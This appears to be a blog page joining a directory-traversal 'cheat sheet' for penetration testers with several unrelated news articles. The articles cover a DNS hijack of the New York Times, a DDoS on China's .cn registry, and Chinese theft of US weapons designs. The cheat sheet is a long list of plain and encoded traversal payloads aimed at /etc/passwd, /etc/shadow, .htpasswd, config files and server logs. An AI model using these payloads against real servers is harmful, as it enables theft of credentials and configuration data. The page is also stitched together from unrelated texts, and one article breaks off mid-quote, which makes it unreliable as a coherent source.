Directory Traversal Attack Cheat Sheet for Application Penetration Test

 

Are attackers dot-dot-slashing their way into your data?

About as simple to fix as they are to exploit, directory traversal vulnerabilities stand as a persistent threat in the application environment. Yet it is one that many developers and even security teams are unaware can lead attackers to gain valuable information about how a system is organized, to get access to sensitive files on the application server, or even to easily leverage to start other attacks on that server or the rest of the network. 

According to Imperva's most recent "Web Application Attack Report," released last month, directory traversal attacks against retail Web applications made up 31 percent of the attacks compared to the eight most prevalent types of attacks, and they made up 36 percent of attacks against all other industries' Web apps. In retail, that number lagged behind a whopping 53 percent of SQL injection attacks, but in other verticals it even led SQLi, which only made 27 percent of attacks. Meanwhile, secure hosting firm FireHost also reported last month in its Superfecta attack statistics about four major attacks it commonly blocks -- XSS, directory traversal, cross-site request forgery, and SQL injection -- directory traversal ranked second behind XSS, making up 23 percent of the 9.8 million attacks blocked from these four major categories using its IP Reputation Management system.

Here I have attached most important Directory Traversal Attack Cheat Sheet for info-sec auditors and developers. 

/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

How Twitter Dodged Website Attack That Took Down New York Times

 

Chalk one up for Twitter Inc.

While the New York Times and Google Inc. (GOOG:US) had visitors to their sites redirected this week by hackers, the microblogging service was better able to deflect attacks because of a simple tool called a registry lock. Like alerts sent to credit-card users when something bad happens, the feature notifies website managers of attempts by intruders to tamper with critical information, such as Web-address data.
The cost? As little as $50 a year.

STORY: How Syrian Hackers Found the New York Times's Australian Weak Spot

Large banks, e-commerce companies, gambling sites and pornographers have used registry locks from VeriSign Inc. (VRSN:US) and NeuStar Inc. (NSR:US) to prevent unauthorized changes. Attacks by the Syrian Electronic Army routed New York Times readers to a site that displayed the group’s initials and altered some registration data. They underscore how vulnerable many companies are to relatively unsophisticated attacks, which can take down sites and harm their businesses.
“This is certainly an ah-ha moment,” said Rodney Joffe, a senior technologist at NeuStar. The Sterling, Virginia-based company began offering registry locks in 2010 and requires that website domain information be accompanied by two layers of verification, such as additional codes from security tokens.
“It is a niche business but there’s no reason for it to be,” he said. “It’s the kind of thing you have to do today.”

VIDEO: Anatomy of a Hack: How the NY Times Was Hit

While Twitter’s site operated normally, twitter.co.uk was inaccessible for some users. The Syrian Electronic Army, which backs the country’s president, Bashar al-Assad, claimed responsibility for the New York Times and Twitter intrusions, as well as the Washington Post this month and the Financial Times in early May. Unknown hackers altered Google’s website in the Palestinian territories, displaying a map without Israel.

Raising Bar

The attacks exploited weaknesses in a registration network called the Domain Name System, exposing risks that site operators face because they’re relying on third parties to handle their online addresses. Weaknesses in DNS, which was created in the 1980s to help computers find websites using names instead of numbers, haven’t been seen as a significant threat outside of the financial-services and retail sectors up to now, according to John Pescatore, director of emerging-security trends at the SANS Institute in Stamford, Connecticut.
“There are still a lot of sloppy practices,” Pescatore said. “There’s a lot of room to raise the bar.”

BLOG: Twitter Is Out to Destroy Obamacare

Because Twitter, based in San Francisco, monitors its DNS information in real time and had implemented a registry lock, it was better prepared than the New York Times, according to HD Moore, chief research officer at Rapid7, a Boston-based security firm. Since the attacks, many other companies have moved to institute similar safeguards, he said.

DNS Flaw

Twitter has had its DNS records hacked before. The company acknowledged in 2009 that its DNS records were compromised by hackers who defaced the site with a message about Iran. Jim Prosser, a spokesman for Twitter, declined to comment on the company’s security measures.
A vast system that underpins how computers locate each other, DNS is often called the phone book of the Internet. In 2008, Dan Kaminsky, a security researcher, uncovered a flaw in the system that would let hackers easily impersonate legitimate sites. He worked with technology companies to fix it. The finding prompted several companies that process financial transactions online to adopt additional security measures to ensure their domain information is secure, while others stayed on the sidelines, according to SANS’s Pescatore.

STORY: New York Times: We’ve Been Hacked

Security Steps

NeuStar and VeriSign, another provider of registry lock services, declined to identify the companies using its registry lock services. Danny McPherson, chief security officer of VeriSign, said in a statement that the technology gives customers more control over who can change information.
Eileen Murphy, a spokeswoman for the New York Times (NYT:US) Co., said the newspaper is looking at additional measures.
“In light of this attack and the apparent vulnerability even at what had been highly secure registrars, we are tightening all of our security,” she said.

STORY: Twitter to Advertisers: You Really Need Us

Jay Nancarrow a spokesman for Google, declined to comment on the company’s security. The company’s Palestine site itself wasn’t hacked and Google is talking with the domain manager to resolve the issue, he said.
One complication of hosting sites with addresses of specific countries or regions is that many of the registration providers don’t use registry locks and other protective steps, said Paco Hope, a principal consultant with Cigital Inc.
“When you’re a company like the New York Times or Twitter or Google, your stock in trade is the Internet, it’s the service you offer, and that’s why it makes sense to put in a lot more security,” Hope said.

The rise in sophisticated hacking attacks is helping fuel a market for computer-security technology that is expected to exceed $65.7 billion this year, according to Gartner Inc.

Many companies that didn’t prioritize a threat involving their DNS records are now rethinking that approach, SANS’s Pescatore said.

“It’s one of several Achilles’ heels of using the Internet,

Lack of Details on China Hacking Claim Puzzles Analysts

A netizen in Leping, Jiangxi province uses a smartphone to browse the China Internet Network Information Center (CNNIC) website, July 17, 2013.

ImagineChina

A recent cyberattack on China's country-level .cn domain may not be all that it seems, computer experts said this week.

Beijing's China Internet Network Information Center (CNNIC), which maintains the registry for the top-level domain, announced this week that it was crippled by two distributed denial of service (DDoS) attacks on websites using the .cn suffix in the early hours of Sunday morning.

The first started around midnight Beijing time, and service was restored by around 2:00 p.m. local time, CNNIC said in a statement.

The second, which hit at around 4:00 p.m. local time, was the largest ever DDoS attack to hit China's Internet.

Many websites were rendered completely inaccessible or extremely slow to load for an unspecified period of time, it said.

Beijing's Ministry of Industry and Information Technology, which oversees CNNIC, has launched "specific contingency plans" to protect national domain name resolution services.

But no details of the attack or the contingency plans were made public, leading cybersecurity experts to question the point of the announcement.

Call for details

Rutgers University computer scientist Zhou Shiyu called on Beijing to make detailed information about the attack public.

"The problem is that there's no evidence that indicates whether this attack came from within China or from overseas," Zhou said. "They must explain this clearly."

"All we know is that [DDoS] attacks are the commonest method of attack," he said.

He added that China was no stranger to carrying out large-scale cyberattacks itself.

"The Chinese government has spent huge amounts of money and resources on developing its ability to carry out online attacks," he said.

Smokescreen attack?

Meanwhile, U.S.-based Internet security analyst Li Hongkuan said the likelihood of Chinese government-backed attacks against the .cn domain existed, but wasn't large.

Beijing could even have staged the attacks as a smokescreen, given that its standard response to allegations of government-backed cyberattacks overseas is that it, too, is the target of such attacks.

"It's quite possible that the Chinese government is a thief crying 'thief,' or that it's bluffing," Li said.

"It's also possible that these attacks came from hackers within China who are critical of the government."

For the time being, CNNIC has apologized for the disruption promised that more details will be made public as soon as they are discovered.

Mandiant

China has rejected claims that its People's Liberation Army (PLA) was behind a series of hacker attacks on U.S. corporate networks described in February report by the security firm Mandiant.

Beijing's Ministry of National Defense denied claims made in a 74-page report by U.S.-based Mandiant which said it had traced a large number of transnational cyberattacks to IP addresses assigned to a building it said belonged to the PLA in Shanghai.

Mandiant said the building was the home of the PLA's cyberespionage "Unit 61398," which it said had stolen data, including intellectual property, from at least 141 companies since 2006.

Mandiant's report said it was "highly unlikely" the Chinese government was unaware of the hacking attacks, and was possibly supporting the cyberespionage.

New York Times

In the same month, The New York Times newspaper accused hackers traced to China of "persistently" infiltrating its computer networks over the last four months, also sparking an angry denial from Beijing.

The paper had hired a team of computer security experts to trace the attacks and block any back doors through which they were gaining access to the system, it said.

Cybersecurity experts said the report should be taken in the context of widespread cyberespionage carried out by a large number of countries.

Confidential report lists U.S. weapons system designs compromised by Chinese cyberspies

Designs for many of the nation’s most sensitive advanced weapons systems have been compromised by Chinese hackers, according to a report prepared for the Pentagon and to officials from government and the defense industry.
Among more than two dozen major weapons systems whose designs were breached were programs critical to U.S. missile defenses and combat aircraft and ships, according to a previously undisclosed section of a confidential report prepared for Pentagon leaders by the Defense Science Board.
Experts warn that the electronic intrusions gave China access to advanced technology that could accelerate the development of its weapons systems and weaken the U.S. military advantage in a future conflict.
The Defense Science Board, a senior advisory group made up of government and civilian experts, did not accuse the Chinese of stealing the designs. But senior military and industry officials with knowledge of the breaches said the vast majority were part of a widening Chinese campaign of espionage against U.S. defense contractors and government agencies.

The significance and extent of the targets help explain why the Obama administration has escalated its warnings to the Chinese government to stop what Washington sees as rampant cyber­theft.
In January, the advisory panel warned in the public version of its report that the Pentagon is unprepared to counter a full-scale cyber-conflict. The list of compromised weapons designs is contained in a confidential version, and it was provided to The Washington Post.
Some of the weapons form the backbone of the Pentagon’s regional missile defense for Asia, Europe and the Persian Gulf. The designs included those for the advanced Patriot missile system, known as PAC-3; an Army system for shooting down ballistic missiles, known as the Terminal High Altitude Area Defense, or THAAD; and the Navy’s Aegis ballistic-missile defense system.
Also identified in the report are vital combat aircraft and ships, including the F/A-18 fighter jet, the V-22 Osprey, the Black Hawk helicopter and the Navy’s new Littoral Combat Ship, which is designed to patrol waters close to shore.
Also on the list is the most expensive weapons system ever built — the F-35 Joint Strike Fighter, which is on track to cost about $1.4 trillion. The 2007 hack of that project was reported previously.
China, which is pursuing a comprehensive long-term strategy to modernize its military, is investing in ways to overcome the U.S. military advantage — and cyber-espionage is seen as a key tool in that effort, the Pentagon noted this month in a report to Congress on China. For the first time, the Pentagon specifically named the Chinese government and military as the culprit behind intrusions into government and other computer systems.
As the threat from Chinese cyber-espionage has grown, the administration has become more public with its concerns. In a speech in March, Thomas Donilon, the national security adviser to President Obama, urged China to control its cyber-activity. In its public criticism, the administration has avoided identifying the specific targets of hacking.
But U.S. officials said several examples were raised privately with senior Chinese government representatives in a four-hour meeting a year ago. The officials, who spoke on the condition of anonymity to describe a closed meeting, said senior U.S. defense and diplomatic officials presented the Chinese with case studies detailing the evidence of major intrusions into U.S. companies, including defense contractors.
In addition, a recent classified National Intelligence Estimate on economic cyber-espionage concluded that China was by far the most active country in stealing intellectual property from U.S. companies.
The Chinese government insists that it does not conduct ­cyber-
espionage on U.S. agencies or companies, and government spokesmen often complain that Beijing is a victim of U.S. cyberattacks.
Obama is expected to raise the issue when he meets with Chinese President Xi Jinping next month in California.
A spokesman for the Pentagon declined to discuss the list from the science board’s report. But the spokesman, who was not authorized to speak on the record, said in an e-mail, “The Department of Defense has growing concerns about the global threat to economic and national security from persistent cyber-intrusions aimed at the theft of intellectual property, trade secrets and commercial data, which threatens the competitive edge of U.S. businesses like those in the Defense Industrial Base.”
The confidential list of compromised weapons system designs and technologies represents the clearest look at what the Chinese are suspected of targeting. When the list was read to independent defense experts, they said they were shocked by the extent of the cyber-espionage and the potential for compromising U.S. defenses.